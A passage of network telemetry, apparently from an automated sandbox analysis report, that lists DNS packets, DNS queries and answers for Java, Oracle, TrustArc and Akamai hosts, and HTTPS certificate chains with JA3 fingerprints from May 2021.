                                                                                                                                                                                  May 6, 2021 17:58:10.436538935 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:10.498418093 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.650891066 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:10.661113024 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:10.719474077 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.731818914 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:10.954509974 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:11.014482021 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:11.274234056 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:11.339565992 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:11.522727966 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:11.579546928 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:11.641833067 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:11.727689028 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:11.787964106 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:11.836374998 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:11.845249891 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:11.885557890 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:12.159320116 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:12.219074965 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:12.328233004 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:12.346910954 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:12.388268948 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:12.408998013 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:12.564884901 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:12.580631018 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:12.642427921 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:12.678725004 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:12.835416079 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:12.884105921 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:13.653453112 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:13.703809977 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:14.563802004 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:14.612484932 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:15.642014027 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:15.690665960 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:21.188018084 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:21.248085022 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:22.497500896 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:22.548291922 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:26.829482079 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:26.933499098 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:37.037045956 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:37.087759018 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:37.645107031 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:37.702646017 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:38.046595097 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:38.095331907 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:38.648335934 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:38.699323893 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:39.038667917 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:39.087491989 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:39.647644043 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:39.696650982 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:41.068387985 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:41.117151976 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:41.656424999 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:41.706859112 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:45.062608004 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:45.112226009 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:45.656541109 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:45.706598997 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:58:49.920969963 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:58:49.988905907 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:59:12.562299967 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:59:12.627789021 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:59:19.803831100 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:59:19.862463951 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:59:51.403914928 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:59:51.478326082 CEST53568038.8.8.8192.168.2.3
                                                                                                                                                                                  May 6, 2021 17:59:56.092036963 CEST5714553192.168.2.38.8.8.8
                                                                                                                                                                                  May 6, 2021 17:59:56.151798010 CEST53571458.8.8.8192.168.2.3

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                  May 6, 2021 17:58:06.867396116 CEST192.168.2.38.8.8.80x98b2Standard query (0)www.java.comA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:08.093818903 CEST192.168.2.38.8.8.80x59fbStandard query (0)www.java.comA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:08.608974934 CEST192.168.2.38.8.8.80xb32dStandard query (0)static.oracle.comA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:08.988668919 CEST192.168.2.38.8.8.80xb9ddStandard query (0)s.go-mpulse.netA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:09.437083006 CEST192.168.2.38.8.8.80x7edcStandard query (0)c.go-mpulse.netA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:09.888776064 CEST192.168.2.38.8.8.80xcf7aStandard query (0)c.oracleinfinity.ioA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:10.436538935 CEST192.168.2.38.8.8.80xce38Standard query (0)consent.trustarc.comA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:10.650891066 CEST192.168.2.38.8.8.80x37ccStandard query (0)dc.oracleinfinity.ioA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:10.661113024 CEST192.168.2.38.8.8.80xaa13Standard query (0)www.oracle.comA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:10.954509974 CEST192.168.2.38.8.8.80x665cStandard query (0)consent-pref.trustarc.comA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.274234056 CEST192.168.2.38.8.8.80xd4ceStandard query (0)consent-st.trustarc.comA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.522727966 CEST192.168.2.38.8.8.80xf4adStandard query (0)docs.cyberservices.bizA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.579546928 CEST192.168.2.38.8.8.80x3eb2Standard query (0)oracle.112.2o7.netA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.787964106 CEST192.168.2.38.8.8.80x90e4Standard query (0)prefmgr-cookie.truste-svc.netA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.159320116 CEST192.168.2.38.8.8.80x8b34Standard query (0)685d5b19.akstat.ioA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.328233004 CEST192.168.2.38.8.8.80x2bc8Standard query (0)trial-eum-clientnsv4-s.akamaihd.netA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.346910954 CEST192.168.2.38.8.8.80x879aStandard query (0)trial-eum-clienttons-s.akamaihd.netA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.564884901 CEST192.168.2.38.8.8.80xc179Standard query (0)84-17-52-78_s-23-32-238-155_ts-1620316692-clienttons-s.akamaihd.netA (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.580631018 CEST192.168.2.38.8.8.80x2061Standard query (0)kqitits7mulnqyeucika-p323bx-53d3b3fe1-clientnsv4-s.akamaihd.netA (IP address)IN (0x0001)

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                  May 6, 2021 17:58:06.930119991 CEST8.8.8.8192.168.2.30x98b2No error (0)www.java.comds-www.java.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:08.155834913 CEST8.8.8.8192.168.2.30x59fbNo error (0)www.java.comds-www.java.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:08.675712109 CEST8.8.8.8192.168.2.30xb32dNo error (0)static.oracle.comds-oracle-microsites.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:09.048226118 CEST8.8.8.8192.168.2.30xb9ddNo error (0)s.go-mpulse.netip46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:09.500181913 CEST8.8.8.8192.168.2.30x7edcNo error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:09.947135925 CEST8.8.8.8192.168.2.30xcf7aNo error (0)c.oracleinfinity.ioc.oracleinfinity.io.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:10.498418093 CEST8.8.8.8192.168.2.30xce38No error (0)consent.trustarc.com143.204.209.41A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:10.498418093 CEST8.8.8.8192.168.2.30xce38No error (0)consent.trustarc.com143.204.209.4A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:10.498418093 CEST8.8.8.8192.168.2.30xce38No error (0)consent.trustarc.com143.204.209.30A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:10.498418093 CEST8.8.8.8192.168.2.30xce38No error (0)consent.trustarc.com143.204.209.71A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:10.719474077 CEST8.8.8.8192.168.2.30xaa13No error (0)www.oracle.comds-www.oracle.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:10.731818914 CEST8.8.8.8192.168.2.30x37ccNo error (0)dc.oracleinfinity.iodc.oracleinfinity.io.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.014482021 CEST8.8.8.8192.168.2.30x665cNo error (0)consent-pref.trustarc.com143.204.209.31A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.014482021 CEST8.8.8.8192.168.2.30x665cNo error (0)consent-pref.trustarc.com143.204.209.127A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.014482021 CEST8.8.8.8192.168.2.30x665cNo error (0)consent-pref.trustarc.com143.204.209.93A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.014482021 CEST8.8.8.8192.168.2.30x665cNo error (0)consent-pref.trustarc.com143.204.209.77A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.339565992 CEST8.8.8.8192.168.2.30xd4ceNo error (0)consent-st.trustarc.com143.204.209.88A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.339565992 CEST8.8.8.8192.168.2.30xd4ceNo error (0)consent-st.trustarc.com143.204.209.57A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.339565992 CEST8.8.8.8192.168.2.30xd4ceNo error (0)consent-st.trustarc.com143.204.209.112A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.339565992 CEST8.8.8.8192.168.2.30xd4ceNo error (0)consent-st.trustarc.com143.204.209.2A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.641833067 CEST8.8.8.8192.168.2.30x3eb2No error (0)oracle.112.2o7.net35.181.18.61A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.641833067 CEST8.8.8.8192.168.2.30x3eb2No error (0)oracle.112.2o7.net15.237.76.117A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.641833067 CEST8.8.8.8192.168.2.30x3eb2No error (0)oracle.112.2o7.net15.237.136.106A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.727689028 CEST8.8.8.8192.168.2.30xf4adNo error (0)docs.cyberservices.biz50.87.249.219A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.845249891 CEST8.8.8.8192.168.2.30x90e4No error (0)prefmgr-cookie.truste-svc.net34.202.206.65A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.845249891 CEST8.8.8.8192.168.2.30x90e4No error (0)prefmgr-cookie.truste-svc.net3.212.50.245A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:11.845249891 CEST8.8.8.8192.168.2.30x90e4No error (0)prefmgr-cookie.truste-svc.net3.232.192.25A (IP address)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.219074965 CEST8.8.8.8192.168.2.30x8b34No error (0)685d5b19.akstat.iowildcard46.akstat.io.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.388268948 CEST8.8.8.8192.168.2.30x2bc8No error (0)trial-eum-clientnsv4-s.akamaihd.neta248.b.akamai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.408998013 CEST8.8.8.8192.168.2.30x879aNo error (0)trial-eum-clienttons-s.akamaihd.nettrial-eum.cname.clienttons.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.408998013 CEST8.8.8.8192.168.2.30x879aNo error (0)trial-eum.cname.clienttons.coma1024.dscg.akamai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.642427921 CEST8.8.8.8192.168.2.30xc179No error (0)84-17-52-78_s-23-32-238-155_ts-1620316692-clienttons-s.akamaihd.net84.17.52.78_s-23.32.238.155_ts-1620316692.cname.clienttons.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.642427921 CEST8.8.8.8192.168.2.30xc179No error (0)84.17.52.78_s-23.32.238.155_ts-1620316692.cname.clienttons.coma1024.dscg.akamai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.678725004 CEST8.8.8.8192.168.2.30x2061No error (0)kqitits7mulnqyeucika-p323bx-53d3b3fe1-clientnsv4-s.akamaihd.netkqitits7mulnqyeucika-p323bx-53d3b3fe1.ipv4-only.cname.clienttons.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                  May 6, 2021 17:58:12.678725004 CEST8.8.8.8192.168.2.30x2061No error (0)kqitits7mulnqyeucika-p323bx-53d3b3fe1.ipv4-only.cname.clienttons.coma248.b.akamai.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                                                  HTTPS Packets

                                                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                  May 6, 2021 17:58:10.593436003 CEST143.204.209.41443192.168.2.349722CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USThu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                  May 6, 2021 17:58:10.593487978 CEST143.204.209.41443192.168.2.349723CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USThu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                  May 6, 2021 17:58:11.101504087 CEST143.204.209.31443192.168.2.349729CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USThu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                  May 6, 2021 17:58:11.101572990 CEST143.204.209.31443192.168.2.349728CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USThu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                  May 6, 2021 17:58:11.429073095 CEST143.204.209.88443192.168.2.349732CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USThu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
